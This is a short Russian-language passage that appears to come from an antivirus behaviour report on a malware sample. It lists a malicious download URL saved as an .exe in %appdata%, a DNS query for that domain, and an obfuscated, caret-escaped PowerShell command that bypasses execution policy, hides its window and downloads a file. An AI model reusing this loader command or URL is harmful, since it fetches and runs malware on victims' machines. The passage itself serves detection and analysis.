Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OwE^RS^HEl^L^.e^Xe ^-^eXeCUTI^O^n^P^O^L^iCY ^B^Yp^As^S ^-^N^o^P^ROFiL^E -WINdOwStyl^E^ H^i^d^d^E^N^ ^(^n^EW-OBJect S^y^S^TEm^.^Net.WEbCLi^ENT^)^.^dOwNLoA^D^fi^l^E('http:...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "p^OwE^RS^HEl^L^.e^Xe ^-^eXeCUTI^O^n^P^O^L^iCY ^B^Yp^As^S ^-^N^o^P^ROFiL^E -WINdOwStyl^E^ H^i^d^d^E^N^ ^(^n^EW-OBJect S^y^S^TEm^.^Net.WEbCLi^ENT^)^.^dOwNLoA^D^fi^l^E('http:...' (со скрытым окном)